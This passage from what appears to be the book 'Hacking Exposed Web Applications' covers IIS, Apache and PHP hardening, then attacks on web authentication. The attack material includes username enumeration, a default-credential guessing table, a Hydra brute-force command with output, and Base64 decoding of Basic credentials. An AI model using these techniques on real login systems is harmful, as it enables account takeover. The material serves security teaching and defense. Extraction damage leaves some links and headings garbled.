past, directory traversal exploits were quite common on the IIS platform (see the “References & Further Reading” section for links to past advisories). To date, these types of attacks have been restricted by URL syntax that doesn’t allow the ability to jump across volumes. Thus, by moving the IIS web root to a volume without powerful tools like cmd.exe, such exploits aren’t feasible. When you relocate your web roots to a new drive, make sure the integrity of any filesystem ACLs is maintained. On Windows servers, if you fail to do this, the ACLs will be set to the default in the destination: Everyone:Full Control! The Robocopy tool from the Windows Server Resource Kit is a handy tool for moving Windows files and folders with ACLs intact. The Robocopy /SEC switch is the relevant parameter to consider. Remove Unused Extension Mappings Throughout the years, there have been many security issues surrounding IIS extensions known as ISAPI DLLs. Some of these include the .printer buffer overflow and the +.htr source disclosure bug. All of the bugs lay within ISAPI DLLs that should be disabled by removing the specific DLL application mappings. You also have the option of deleting the actual .dll files. When you remove the application mapping, the DLLs won’t be loaded into the IIS process during startup. As a result, the vulnerabilities can’t be exploited. With the release of IIS 6 and subsequent versions, Microsoft disables all extensions by default. If you’re a Microsoft shop, this and many other security improvements since IIS 6 make it our minimum recommendation when deploying IIS as the web platform of Chapter 3: Hacking Web Platforms 111 choice. A good practice is to follow Microsoft’s lead with IIS and work with your development team to identify what extensions are needed and disable all others. Use UrlScan Newer versions of UrlScan (version 3.1 at the time of writing) allow administrators to define filter rules used to block harmful HTTP requests from reaching the web server. UrlScan can be used to filter not just URIs, but query strings and HTTP headers, too. Although UrlScan is a useful tool for blocking attack strings, it is no substitute for identifying and fixing application vulnerabilities during the development process, as we will discuss in Chapter 10. Always Use NTFS for Web Server Volumes and Conservatively Set Your ACLs! With FAT and FAT32 file systems, file- and directory-level access control is impossible; as a result, the IUSR account has carte blanche to read and upload files. When configuring access control on web-accessible NTFS directories, use the least-privilege principle. IIS 5 and above also provide the IIS Permissions Wizard that walks you through a scenariobased process of setting ACLs. We strongly suggest that you use it. Move, Rename, Delete, or Restrict Any Powerful Utilities Microsoft recommends setting the NTFS ACLs on cmd.exe and several other powerful executables to Administrator and SYSTEM:Full Control only. Microsoft has publicly demonstrated that this simple trick stops most remote command execution shenanigans cold, because IUSR no longer has permissions to access cmd.exe. Microsoft also recommends using the built-in CACLS tool to set these permissions globally. Let’s walk through an example of how CACLS might be used to set permissions on executable files in the system directory. Because so many executable files are in the system folder, it’s easier for us to explore a simple example by moving files to a new directory called test1 with a subdirectory named test2. Using CACLS in display-only mode, we can see the existing permissions of our test files are way too lax: C:\cacls test1 /T C:\test1 Everyone:(OI)(CI)F C:\test1\test1.exe Everyone:F C:\test1\test1.txt Everyone:F C:\test1\test2 Everyone:(OI)(CI)F C:\test1\test2\test2.exe Everyone:F C:\test1\test2\test2.txt Everyone:F 112 Hacking Exposed Web Applications Let’s assume that you want to change the permissions for all executable files in test1 and all subdirectories to System:Full, Administrators:Full. Here’s the command syntax you’d need using CACLS: C:\cacls test1\*.exe /T /G System:F Administrators:F Are you sure (Y/N)?y processed file: C:\test1\test1.exe processed file: C:\test1\test2\test2.exe Now you run CACLS again to confirm your results. Note that the .txt files in all subdirectories have the original permissions, but the executable files are now appropriately set: C:\cacls test1 /T C:\test1 Everyone:(OI)(CI)F C:\test1\test1.exe NT AUTHORITY\SYSTEM:F BUILTIN\Administrators:F C:\test1\test1.txt Everyone:F C:\test1\test2 Everyone:(OI)(CI)F C:\test1\test2\test2.exe NT AUTHORITY\SYSTEM:F BUILTIN\Administrators:F C:\test1\test2\test2.txt Everyone:F When applying this example to a typical web server, it’s a good practice to set ACLs on all executables in the %systemroot% directory to System:Full, Administrators:Full, like so: C:\cacls %systemroot%\*.exe /T /G System:F Administrators:F This blocks nonadministrative users from these executables and helps to prevent exploits such as Unicode, which rely heavily on nonprivileged access to these programs. Of course, such executables may also be moved, renamed, or deleted, putting them even further out of the reach of hackers. Remove the Everyone and Guests Groups from Write and Execute ACLs on the Server The anonymous IIS access accounts IUSR_machinename and IWAM_machinename are members of these groups. You want to be extra careful that the IUSR and IWAM accounts don’t have write access to any files or directories on your system—you’ve already witnessed what shenanigans a single writable directory can lead to! Also, carefully scrutinize execute permissions for nonprivileged groups. And be especially sure not to allow any nonprivileged users to have both write and execute permissions to the same directory! Chapter 3: Hacking Web Platforms 113 Scrutinize Existing ISAPI Applications for Calls to RevertToSelf and Expunge Them Older versions of IIS were vulnerable to a privilege escalation attack against the RevertToSelf Win32 programming call. By instantiating an existing DLL that made this call, attackers could subvert it to gain all-powerful LocalSystem privileges. IIS versions 5 and older are the main concern here, although version 6 in compatibility mode can also be vulnerable. You can help prevent RevertToSelf calls from being used to escalate privilege by assessing your IIS DLLs for this call. Use the dumpbin tool included with many Win32 developer tools to assist you with this, as shown in the following example using IsapiExt.dll: dumpbin /imports IsapiExt.dll | find "RevertToSelf" Apache Hardening Apache comes fairly secure right out of the box, and the Apache group does a good job at fixing most security problems quickly. When you start using Apache in the real world, though, and run real-world web applications on top of it, securing Apache can begin to get quite complex. In fact, when looking at all the ways Apache can be configured and the ways that it can be misconfigured, the task of securing Apache or even knowing all the proper ways of securing Apache becomes quite daunting. We have compiled a list of what some consider to be the top security basics that should be done on any Apache server in order to harden the server properly. This list is by no means comprehensive or complete and can change depending on what you might be using the server for. Luckily, plenty of automated scripts, tools, and documentation are available that can be used to help you walk through a proper Apache security configuration. References to these can be found at the end of this chapter. Disable Unneeded Modules One of the most important things to consider when installing Apache is what types of functionality the web server needs to have. For instance, are PHP scripts or Perl scripts going to be run? Will Server Side Includes be used in the application running on the web server? Once you can create a list of needed functionality, you can enable the appropriate modules. You can retrieve a list of all the enabled modules by using httpd: # httpd –l Compiled-in modules: http core.c mod env.c mod log config.c mod mime.c mod negotiation.c 114 Hacking Exposed Web Applications mod status.c mod include.c mod autoindex.c mod dir.c mod cgi.c mod asis.c mod imap.c mod actions.c mod userdir.c mod alias.c mod access.c mod auth.c mod so.c mod setenvif.c mod perl.c To disable modules, use the configure script before compiling and pass in any modules that should be disabled. • For Apache 1.x ./configure • For Apache 2.x ./configure disable module=userdir disable userdir This method is used to remove built-in modules in Apache and does not apply to dynamic modules. The modules shown in Table 3-2 could be a security risk and we recommend removing them in your Apache configuration. Module mod_userdir mod_info mod_status mod_include Description Allows username home folders to be present on the web server via the /~username/ request Allows an attacker to view the Apache configuration Displays runtime information about Apache status Allows the use of Server Side Includes, which are rarely used today and can represent a significant security risk Table 3-2 Apache Modules That Are Potential Security Risks and Should Be Considered for Removal Chapter 3: Hacking Web Platforms 115 Implement ModSecurity ModSecurity is an Apache module written by Ivan Ristic that works as a web application firewall. It has a huge amount of flexibility and is considered one of the best projects available in terms of helping to secure Apache against application and web platform attacks. Some of ModSecurity’s features are listed here: • Request filtering • Anti-evasion techniques • HTTP filtering rules • Full audit logging • HTTPS intercepting • Chroot functionality • Mask web server identity Chrooting Apache One of the standard rules in security is to practice defense in depth. When attackers break into a web server, one of the first things the attackers will do is attempt to access files on the system such as /etc/passwd, or escalate their privileges via a local exploit. In order to prevent this type of attack, a method of putting the Apache server in a contained environment, or “jail” of sorts, has been created, and it is called chrooting. By implementing this, Apache runs with limited privileges inside of its own contained file system. If attackers were to gain access to the file system, they would be stuck inside this jail environment with no access to the real file system. There are two methods to chrooting Apache that we’ll review here. External Chrooting This type of chrooting starts out with a file system that contains nothing but the basic shell. All processes and required dependencies need to be copied to this environment in order to run. This is a real containment method for Apache in that if an attacker breaks into a shell somehow, he has nowhere to go. The method to set up and configure this kind of jail is complex and requires research, depending on what software is required to run with the web application. To find out more detailed steps on how to set up this environment, see the “References & Further Reading” section at the end of this chapter. Internal Chrooting Internal chrooting is different from external chrooting in that during internal chrooting, the chroot is created from inside the Apache process. Apache starts out and initializes normally but then creates a chroot environment for the process to run. By default, Apache 116 Hacking Exposed Web Applications does not support this kind of chroot method. However, a couple of people have created third-party add-ons that enable Apache to support this. • ModSecurity supports a chroot environment via its SecChrootDir configuration. Just set the value to the directory where you would like Apache to be jailed. • ModChroot is an Apache module that works in the same manner as the ModSecurity chroot. Just set the ChrootDir to the proper directory. • Apache chroot(2) patch by Arjan De Vet is an actual patch to Apache that enables support for internal chrooting. Implement SuExec Implementing an execution wrapper like SuExec allows you to run CGI scripts with the privileges of another user besides the default Apache web user. Used correctly, this can help enforce the principle of least privilege, which is an important element of building “defense-in-depth” into a web server. Let’s look at an example where SuExec could be used to provide least privilege. A multihosted environment exists that allows each virtual-hosted web site to upload and host its own scripts. If SuExec is not used, any hole, or even a malicious web site administrator, could access the contents of any of the other web sites being hosted on that server. This can be a big problem, particularly if you have tested your web site and have taken all precautions to secure your code and create a good secure web configuration, only to find out you were hacked because one of the other virtual sites had a security issue and an attacker gained access via that route over which you had no control. Now you can see why something like SuExec is important. Installing and configuring SuExec can sometimes be a complex and frustrating process. SuExec’s configuration is very strict and multiple things have to be set up properly. We suggest walking through the process using Apache’s documentation, which can be located in the “References & Further Reading” section at the end of this chapter. Document Root Restriction An important configuration is to make sure that Apache is not allowed to access anything outside the document root. This type of restriction is quite simple and can be done with the following configuration change in httpd.conf: order deny,allow deny from all order allow,deny allow from all Chapter 3: Hacking Web Platforms 117 Using Apache Benchmark from CIS Manually going through and trying to secure Apache is a daunting task; luckily, there is the Apache Benchmark from the Center of Internet Security. They produce a document that explains how to harden Apache properly and produce a tool that checks your given configuration and explains whether you pass or fail a certain security requirement. The following is a simple walkthrough of how to use their tool to check an Apache configuration. First, download the product from their web site and unzip it to a working directory. Run the script and point it to your httpd.conf file: ./ -c /etc/apache2/apache2.conf -o result.html # [ CIS Apache Benchmark Scoring Tool 2.10 ] # Score an Apache configuration file with the CIS Apache Benchmark. Version: 2.10 Copyright 2003-2005, CISecurity. All rights reserved. # # CIS Apache Benchmark requires answers to the following questions: Press enter to continue. Questions --------------------------------------------- Location of the Apache server binary [] /usr/sbin/apache2 - Has the Operating System been hardened according to any and all applicable OS system security benchmark guidance? [yes|no] - Created three dedicated web groups? [yes|no] - Downloaded the Apache source and MD5 Checksums from httpd.apache .org? [yes|no] - Verified the Apache MD5 Checksums? [yes|no] - Applied the current distribution patches? [yes|no] - Compiled and installed Apache distribution? [yes|no] - Is the webmaster@localhost address a valid email alias? [yes|no] - Are fake CGI scripts used? [yes|no] - Have you implemented any basic authentication access controls? [yes|no] - Updated the default apachectl start script's code to send alerts to the appropriate personnel? [yes|no] The Benchmark asks a series of questions, runs a security-checking script against your configuration, and produces a report, letting you know what issues need to be fixed. You can then reference the included Benchmark document for how to solve each issue. 118 Hacking Exposed Web Applications PHP Best Practices Since we discussed a number of vulnerabilities in the popular PHP scripting platform, here are a few tips on making sure you avoid them: • Apply strict input validation to all user input. • Use eval(), passthru(), system(), and other functions sparingly and without user input. • Turn register_globals off. Common Security Options for PHP The following configuration options are security related and can be set in the php.ini file. Using these settings ensures that the PHP configuration you have running is securely set by default. open_basedir This setting will restrict any file access to a specified directory. Any file operations are then limited to what is specified here. A good recommendation is that any file operations being performed should be located within a certain set of directories. This way, the standard old “../../../../etc/passwd” won’t go anywhere. disable_functions This allows a set of functions to be disabled in PHP. Disabling functions is considered a great way to practice defense in depth. If the applications don’t make use of securityrisky functions such as eval(), passthru(), system(), etc., then add these as functions that should never be allowed. If an attacker does find a security issue in PHP code, it will cause you some headaches. expose_php Setting this configuration to off will remove the PHP banner that displays in the server headers on an HTTP response. If your concern is to hide the version of PHP or the fact that it is running on the application, setting this will help. display_errors This setting is a simple but important configuration that enables detailed error information to be displayed to the user on an exception. This setting should always be turned off in any production environment. safe_mode Turning safe_mode on in PHP allows very strict file access permissions. It does this by checking the permissions of the owner of the PHP script that is running and any file access that the script attempts. If the permissions do not match, then PHP throws a security exception. Safe_mode is mostly used by ISPs, so that in virtual-hosted Chapter 3: Hacking Web Platforms 119 environments, multiple users can develop their own PHP scripts without risking the integrity of the server. allow_url_fopen This configuration option will disable the ability to do file operations on remote files. This is a nice overall setting to prevent remote file inclusion vulnerabilities from working. An example of this would be if the $absolute_path variable in the following code sample was set to a value of; the exploit would fail because allow_url_ fopen was set. include($absolute path.'inc/adodb/'); SUMMARY In this chapter, you learned that the best defense for many major web platform vulnerabilities includes keeping up with vendor security patches, disabling unnecessary functionality on the web server, and diligently scanning for the inevitable offender that sneaks past your predeployment validation processes. Remember, no application can be secured if it’s built on a web platform that’s full of security holes. REFERENCES & FURTHER READING Reference Relevant Security Advisories WebLogic Node Manager Command Execution Apache Tomcat Default Blank Admin Password “Multiple Vulnerabilities in Sun-One Application Server,” includes a log evasion issue “Preventing Log Evasion in IIS,” by Robert Auger TRACK Log Bypass Apache Mailing Lists— recommend subscription to announcements to receive security bulletin information Link alerts.htm .cgi?name=CVE-2009-3548 bugtraq/2003-05/0300.html .shtml 120 Hacking Exposed Web Applications Reference PHPXMLRPC Remote PHP Code Injection Vulnerability PEAR XML_RPC Remote PHP Code Injection Vulnerability phpAdsNew XML-RPC PHP Code Execution Vulnerability A Study in Scarlet, Exploiting Common Vulnerabilities in PHP Applications PEAR XML-RPC patch XML-RPC for PHP patch WebInsta patch Free Tools jad, the Java disassembler Apache ModSecurity mod_chroot Apache chroot(2) patch by Arjan De Vet Apache SuExec documentation The Center for Internet Security (CIS) Apache Benchmark tool and documentation SysInternals Process Monitor Microsoft Update Service Microsoft UrlScan tool Cygwin Commercial Tools CORE IMPACT, a penetration testing suite from Core Security Technologies Link 152005.67 .html 142005.66 .html bb896645.aspx Chapter 3: Hacking Web Platforms 121 Reference CANVAS Professional, an exploit development framework from Immunity Metasploit Express General References IIS Security Checklist “Securing Apache: Step By Step,” by Ryan C. Barnett Bastille Linux Hardening Program Apache Security by Ivan Ristic (O’Reilly) Link practical.html 4 AAuttthaceknitnigcaWteiobn 124 Hacking Exposed Web Applications Authentication plays a critical role in the security of a web application since all subsequent security decisions are typically made based on the identity established by the supplied credentials. This chapter covers threats to common web authentication mechanisms, as well as threats that bypass authentication controls entirely. WEB AUTHENTICATION THREATS We’ve organized our discussion in this section loosely around the most common types of authentication prevalent on the Web at the time of this writing: • Username/password Because of its simplicity, this is the most prevalent form of authentication on the Web. • Strong(er) authentication Since it’s widely recognized that username/ password authentication has fundamental weaknesses, many web sites are beginning to provide stronger forms of authentication for their users, including token- and certificated-based authentication. • Authentication services Many web sites outsource their authentication to Internet services such as Windows Live ID (formerly known as Microsoft Passport), which implements a proprietary identity management and authentication protocol, and OpenID, which is an open standard for decentralized authentication service providers. Both services will be briefly covered at a high level in this chapter. Username/Password Threats Although there are numerous ways to implement basic username/password authentication, web implementations generally fall prey to the same types of attacks: • Username enumeration • Password guessing • Eavesdropping In this section, we’ll discuss each of these attack types and which common web authentication protocols are most vulnerable to them. We haven’t provided risk ratings for any of the attacks listed in this chapter because these are really generic attack types and the risk level depends on the specific implementation of the attack. Chapter 4: Attacking Web Authentication 125 Username Enumeration Username enumeration is primarily used to provide greater efficiency to a passwordguessing attack. This approach avoids wasting time on failed attempts using passwords for a user who doesn’t exist. For example, if you can determine there is no user named Alice, there’s no point in wasting time trying to guess Alice’s password. The following are some examples of functionality often used in web applications that may allow you to determine the username. Profiling Results In Chapter 2, we discussed a few places to identify ambient user information within a web site, such as source code comments. Smart attackers always review their profiling data because it’s often a rich source of such information (textual searches across the profiled information for strings like userid, username, user, usr, name, id, and uid often turn it up). In Chapter 8, we will also discuss common web site structures that give away usernames—the most obvious offender here is the directory named after a user that service providers commonly employ to host customer web content (e.g., http://www Error Messages in Login A simple technique to determine if a username exists is to try to authenticate to a web application using invalid credentials and then examine the resulting error message. For example, try authenticating to the target web application using the username Alice and the password abc123. You are likely to encounter one of three error messages similar to the ones listed here, unless you actually successfully guessed the password: • You have entered a bad username. • You have entered a bad password. • You have entered a bad username/password combination. If you receive the first error message, the user does not exist on the application and you should not waste any time trying to guess the password for Alice. However, if you received the second error message, you have identified a valid user on the system, and you can proceed to try to guess the password. Lastly, if you received the third message, it will be difficult to determine if Alice is actually a valid username (this should be a hint to application designers to use the third message in their own authentication mechanisms). A good example of this is the login functionality implemented by the SiteMinder web authentication product from Computer Associates (CA), who acquired the technology with its acquisition of Netegrity in November 2004. With SiteMinder, you can perform username enumeration by evaluating the error page. If an incorrect username is entered, the site attempts to load nouser.html. If a valid username is entered with an incorrect password, the site attempts to load failedlogin.html. 126 Hacking Exposed Web Applications Error Messages in Self-Service Password Reset Features Similar to the user enumeration vulnerabilities just discussed, self-service password reset (SSPR) functionality is also a common source of user enumeration disclosure vulnerabilities. SSPR is a feature implemented by many web sites that allows users who have either forgotten their password or are otherwise unable to authenticate to fix the problem themselves via “selfservice”; the most typical implementation is a “Forgot Password?” or similar link that e-mails a new password to the e-mail address specified by the user. The e-mail address “authenticates” the user via an alternate mechanism, assuming only the user in question can access that e-mail account and retrieve the new password. Unfortunately, applications that insecurely implement this functionality will often report whether the supplied user account name or e-mail address is valid. An attacker can use the difference in the response between the valid and invalid case to detect whether the account exists. In addition to user enumeration, applications that randomly generate new passwords in response to SSPR requests are also vulnerable to denial-of-service (DoS) attacks. For example, a particularly malicious attacker might create a script to request new passwords repeatedly for each username that is discovered. If the requests are repeated frequently enough, this will flood the target user accounts with e-mails containing new passwords, never allowing that user enough time to use the new password to authenticate against the application. Registration Many web applications allow users to select their own usernames in the registration process. This presents another vector for determining the username. During the registration process, if you select a username of another user who already exists, you are likely to be presented with an error such as “Please choose another username.” As long as the username you have chosen follows the application guidelines and does not contain any invalid characters, this error message is likely an indication that the chosen username is already registered. When given a choice, people often create usernames based on their real names. For example, Joel Scambray may choose usernames such as Joel, JoelS, JScambray, etc. Therefore, attackers can quickly generate a list of common usernames based on real names found in phone books, census data, and other online resources. CAPTCHA technology can be deployed to help mitigate the risk of these attacks. Detailed information on CAPTCHA is available in the “User Registration Attacks” section of this chapter. Account Lockout To mitigate the risk of a password-guessing attack, many applications lock out accounts after a certain number of failed login attempts. Depending on the risks inherent to the application, account lockout thresholds may be set to 3, 5, or more than 10 failed authentications. Many high-volume commercial web sites set the lockout threshold much higher (e.g., 100 failed attempts) to defray the support costs related to unlocking user accounts (typically higher for lower lockout thresholds); again, there is a balance between ease-of-use/support and security that varies depending upon the specific risks faced by a given application. Applications also commonly unlock accounts automatically after a period of 30 minutes, 1 hour, or 24 hours. This is also done to reduce the number of calls made to the support desk to reset accounts. This countermeasure Chapter 4: Attacking Web Authentication 127 effectively slows down a password-guessing attack and, given a good password policy, is considered a good balance of security and usability. However, account lockout only makes sense for valid usernames. How do you lock out an account that doesn’t exist? These are subtleties that many applications implement incorrectly. For example, if the account lockout is set at 3, will an account be locked out if it doesn’t exist? If not, you may have stumbled upon a way to determine invalid accounts. If you lock out an account, the next time you log in, you should receive an error message. However, most applications don’t track this for invalid accounts. Lastly, the best way to prevent username enumeration from account lockout is to not tell the user he or she was locked out at all. This, however, will almost surely result in a frustrated and angry user. Sometimes account lockout is implemented using client-side functionality like JavaScript or hidden tags. For example, there may be a variable or field that represents login attempts. It is trivial to bypass client-side account lockout by modifying the clientside JavaScript or by using a proxy to directly POST login actions (the Burp Suite repeater functionality is good for this; Burp Suite is discussed in Chapter 2) and bypass the JavaScript altogether. Timing Attacks If all else fails, a timing attack may be the last resort of a frustrated attacker. If you can’t enumerate usernames from error messages, registration, or password changes, try calculating the time it takes for an error message to appear for a bad password versus a bad username. Depending on how the authentication algorithm is implemented and the types of technologies used, there may be a significant difference in the time it takes for each type of response (“bad username” versus “bad password”). Observing differences in response timing can provide clues to legitimate usernames and passwords. However, for this technique to be effective, the difference needs to be large enough to overshadow fluctuations due to network latency and load. Keep in mind that this technique is prone to producing a large number of false positives. Before moving into the next section on password guessing with known usernames, we should note that allowing attackers to determine the username is a risk that many online businesses have simply accepted, despite the protestation of concerned security professionals. Password Guessing Not surprisingly, password guessing is the bane of username/password authentication schemes. Unfortunately, such schemes are common on the Web today and thus fall prey to this most basic attack techniques. Password-guessing attacks can usually be executed regardless of the actual authentication protocol in place. Manual guessing is always possible, of course, and automated client software exists to perform password guessing against the most commonly used protocols. We’ll discuss some common password-guessing tools and techniques next. 128 Hacking Exposed Web Applications Manual Password Guessing Password-guessing attacks can be carried out via both manual and automated means. Manual password guessing is tedious, but we find human intuition frequently bests automated tools, especially when customized error pages are used in response to failed forms-based login attempts. When performing password guessing, our favorite choices are shown in Table 4-1. While the list in Table 4-1 is limited, it serves as a good illustration of the type of weak passwords commonly used in applications. With an automated tool, an entire dictionary of username/password guesses can be thrown at an application much more quickly than human hands can type them. A basic search engine query will reveal that several of these dictionaries are widely available online, including tailored dictionaries that focus on certain types of applications, hardware, or devices. Automated Password Guessing There are two basic approaches to automated password guessing: depth first and breadth first. Depth-first algorithms try all the password combinations for a username before trying the next username. This approach is likely to trigger account lockout very quickly because hundreds of authentication attempts will be made against the same account in a short amount of time. Breadth-first algorithms try the combination of different usernames for the same password. Because the authentication attempts are not made consecutively against the same account, the breadth-first method is less likely to trigger an application’s account lockout mechanism. Let’s look at some of the automated web password-guessing tools available today. Automatic password guessing can perform a denial-of-service attack against the application. There is always an increased load on the server and the risk of locking accounts. If you are an attacker, this may be intentional. If you are a tester, however, you should determine if there is an account lockout and proceed accordingly. Username Guesses [NULL] root, administrator, admin operator, webmaster, backup guest, demo, test, trial member, private [company_name] [known_username] Password Guesses [NULL] [NULL], root, administrator, admin, password, [company_name] [NULL], operator, webmaster, backup [NULL], guest, demo, test, trial [NULL], member, private [NULL], [company_name], password [NULL], [known_username] Table 4-1 Common Usernames and Passwords Used in Guessing Attacks (Not Case-sensitive) Chapter 4: Attacking Web Authentication 129 If a password policy is in place and enforced, you can reduce the set of possible passwords to just those permitted by the password policy. For example, if you know that the password policy only allows for alphanumeric characters and requires a combination of capital and lowercase characters, you don’t need to waste time on dictionary words that don’t include numbers. On the other hand, if you are looking at a banking application that uses a four-digit ATM PIN as the password, you know you’ve got a pretty good chance of guessing the PIN/password in around 5,000 guesses. One of the most common authentication protocols used on the Internet today is HTTP Basic. It was first defined in the HTTP specification itself, and while it is by no means elegant, it does get the job done. Basic authentication has its fair share of security problems, and those problems are well documented (the primary issues are that it sends the username/password in a trivially decodeable fashion and that it eagerly sends these credentials with each request). When we encounter a page protected by Basic authentication in our consulting work, we generally turn to Hydra to test account-credential strength. Hydra is a simple tool that takes text lists of usernames and passwords (or combinations of both) and uses them as dictionaries to implement Basic authentication password guessing. It keys on “HTTP 302 Object Moved” responses to indicate a successful guess, and it will find all successful guesses in a given username/password file (that is, it won’t stop guessing once it finds the first valid account). The following example shows Hydra being used on Windows (via the Cygwin library) to guess an HTTP Basic password successfully. We’ve used Hydra’s C option to specify a single username/password file as input and we are attacking the /secure directory (which must be specified following the http get parameter): D:\Toolbox>hydra -C list.txt http-get /secure Hydra v5.0 (c) 2005 by van Hauser / THC - use allowed only for legal purposes. Hydra ( starting at 2005-11-08 21:21:56 [DATA] 6 tasks, 1 servers, 6 login tries, ~1 tries per task [DATA] attacking service http-get on port 80 [STATUS] attack finished for (waiting for childs to finish) [80][www] host: login: user password: guessme Hydra ( finished at 2005-11-08 21:22:01 Hydra supports http head, http get, https head, https get, and http proxy for attacking web applications. WebCracker is an older, Windows-based GUI application that is similar to Hydra but is not as customizable in our experience. It is an excellent tool for a novice, or for performing a quick assessment of account password strength. Figure 4-1 shows WebCracker successfully guessing some accounts on a target URL. Brutus is a generic password-guessing tool that comes with built-in routines for attacking HTTP Basic and Forms-based authentication, among other protocols like SMTP and POP3. Brutus can perform both dictionary attacks (based on precomputed wordlists like dictionaries) and brute-force attacks, where passwords are randomly generated from 130 Hacking Exposed Web Applications Figure 4-1 WebCracker successfully guesses Basic authentication credentials. a given character set (say, lowercase alphanumeric characters). Figure 4-2 shows the main Brutus interface after performing a Basic authentication password-guessing attack. Brutus also performs Forms-based authentication attacks (which we will discuss in an upcoming section). The one thing that annoys us about Brutus is that it does not display guessed passwords when performing Forms-based attacks. We have also occasionally found that it issues false positive results, claiming to have guessed an account password when it actually had not. Overall, however, it’s tough to beat the flexibility of Brutus when it comes to password guessing. NTLM Authorization Proxy Server Integrated Windows authentication (formerly known as NTLM authentication and Windows NT challenge/response authentication) uses the Chapter 4: Attacking Web Authentication 131 Figure 4-2 The Brutus password-guessing tool guesses 4,908 HTTP Basic authentication passwords in 19 seconds. proprietary Microsoft NT LAN Manager (NTLM) authentication algorithm over HTTP. It is implemented primarily by Microsoft’s Internet Explorer browser and IIS web servers, but is also available in other popular software like Mozilla’s Firefox browser through its support of the Simple and Protected GSS-API Negotiation Mechanism (SPNEGO) Internet standard (RFC 2478) to negotiate Kerberos, NTLM, or other authentication protocols supported by the operating system (for example, SSPI on Microsoft Windows, GSS-API on Linux, Mac OS X, and other UNIX-like systems implement SPNEGO). Support for NTLM authentication in security assessment tools has greatly improved over the years, and this support is available in both the Paros and Burp client-side proxies. If your tool of choice does not support NTLM, that support can be obtained through the NTLM Authorization Proxy Server (APS) utility created by Dmitry Rozmanov. A detailed description of how to implement APS is available on the Hacking Exposed Web Applications web site at 132 Hacking Exposed Web Applications Countermeasures for Password Guessing The most effective countermeasure against password guessing is a combination of a strong password policy and a strong account lockout policy. After a small number of unsuccessful login attempts, the application should lock the account to limit the exposure from this type of attack. However, be aware that applications implementing an aggressive account lockout policy may expose themselves to denial-of-service attacks. A malicious attacker targeting such an application may try to lock out all of the accounts on the system through repeated failed authentication attempts. A good compromise that many application developers choose is to temporarily lock the account for a small period of time, say ten minutes. This slows down the rate of password guessing, thereby hindering the effectiveness of password-guessing attacks. With the use of a strong password policy, the likelihood that an attacker will be able to randomly guess a password is greatly diminished. An effectively large key space for passwords, greater than eight alphanumeric characters, in combination with a strong account lockout policy mitigates the exposure against password brute-forcing. Recently, many high-profile web sites such as eBay have begun tracking IP addresses and associating them with your account. For example, attempting to gain access to your account from an unusual IP or from different IPs within a certain time window may trigger additional authentication or requirements such as CAPTCHA. These techniques are designed to prevent distributed or automated guessing attacks. Some financial sites have implemented even stronger requirements such as sending a text message with a confirmation number to a number listed on the account. This confirmation number must then be supplied to the web application in order to successfully authenticate. Many web authentication schemes have no integrated account lockout feature—you’ll have to implement your own logic here. Also, as we’ve noted already, one issue that can frustrate script kiddies is to use custom response pages for Forms-based authentication. This prevents attackers from using generic tools to guess passwords. One variation on this is to use Completely Automated Public Turing Tests to Tell Computers and Humans Apart (CAPTCHA) to fool automated password-guessing routines (we’ll discuss CAPTCHAs in more detail later in this chapter). Finally, it always pays to know what it looks like when you’ve been attacked. Here is a sample log snippet in an abbreviated W3C format taken from a server that was attacked with a Basic authentication password-guessing tool. As can be seen here, the tool used to perform the brute-force attack, Brutus, is listed as part of the user-agent string: #Fields: c-ip cs-username cs-method cs-uri-query sc-status cs(User-Agent) admin HEAD /test/basic - 401 Mozilla/3.0+(Compatible);Brutus/AET test HEAD /test/basic - 401 Mozilla/3.0+(Compatible);Brutus/AET root HEAD /test/basic - 401 Mozilla/3.0+(Compatible);Brutus/AET Chapter 4: Attacking Web Authentication 133 Authentication failures are written to the Security Event Log, so we recommend regularly monitoring it for signs of potential brute-forcing attacks. For more details on the different types of logging that occurs for authentication failures, please see the additional links at the end of this chapter. Figure 4-3 shows what a typical log event looks like following a Basic password-guessing attack. Eavesdropping and Replay Attacks Any authentication protocol that exposes credentials while in transit over the network is potentially vulnerable to eavesdropping attacks, which are also called sniffing attacks after the colloquial term for network protocol analyzers. A replay attack usually is built upon eavesdropping and involves the use of captured credentials by an attacker to spoof the identity of a valid user. Figure 4-3 Password-guessing attempts against Windows IIS result in these events written to the Security Log. 134 Hacking Exposed Web Applications Unfortunately, some of the most popular web authentication protocols do expose credentials on the wire. We’ll talk about common attacks against popular web authentication protocols in the following sections. Basic We’ve already seen how HTTP Basic authentication can be vulnerable to password guessing. Now we’ll talk about another weakness of the protocol. In order to illustrate our points, we’ll first give you a bit of background on how Basic works. Basic authentication begins when a client submits a request to a web server for a protected resource, without providing any authentication credentials. In response, the server will reply with an access denied message containing a WWW Authenticate header requesting Basic authentication credentials. Most web browsers contain routines to deal with such requests automatically by prompting the user for a username and a password, as shown in Figure 4-4. Note that this is a separate operating system window instantiated by the browser, not an HTML form. Once the user types in his or her password, the browser reissues the requests, this time with the authentication credentials. Here is what a typical Basic authentication exchange looks like in raw HTTP (edited for brevity). First, here’s the initial request for a resource secured using Basic authentication: GET /test/secure HTTP/1.0 Figure 4-4 A web browser prompts a user for Basic authentication. Chapter 4: Attacking Web Authentication 135 The server responds with an HTTP 401 Unauthorized (authentication required) message containing the WWW Authenticate: Basic header: HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm "luxor" This causes a window to pop up in the client browser that resembles Figure 4-4. The user types his or her username and password into this window and clicks OK to send it via HTTP: GET /test/secure HTTP/1.0 Authorization: Basic dGVzdDp0ZXN0 Note that the client has essentially just re-sent the same request, this time with an Authorization header. The server then responds with another “unauthorized” message if the credentials are incorrect, a redirect to the resource requested, or the resource itself, depending on the server implementation. Wait a second—where are the username and password? Per the Basic authentication spec, the authentication credentials are sent in the Authorization header in the response from the client and the credentials are encoded using the Base64 algorithm. Those unfamiliar with Base64 may, at first glance, believe it is a type of encryption due to the rather opaque encoded form. However, because Base64 is a type of encoding, it is trivial to decode the encoded values using any number of readily available utilities or scripting languages. A sample Perl script has been provided here to illustrate the ease with which Base64 can be manipulated: #!/usr/bin/perl # # decode from base 64 use MIME::Base64; print decode base64($ARGV[0]); Let’s run this decoder on the value we saw in our previous example of Basic authentication in action: C:\ dGVzdDp0ZXN0 test:test As you can see, Basic authentication is wide open to eavesdropping attacks, despite the inscrutable nature of the value it sends in the Authorization header. This is the protocol’s most severe limitation. When used with HTTPS, the limitation is mitigated. However, client-side risks associated with Basic authentication remain because there is no inactivity timeout or logout without closing the browser. 136 Hacking Exposed Web Applications Digest Digest authentication, described in RFC 2617, was designed to provide a higher level of security than Basic. Digest authentication is based on a challenge-response authentication model. This technique is commonly used to prove that someone 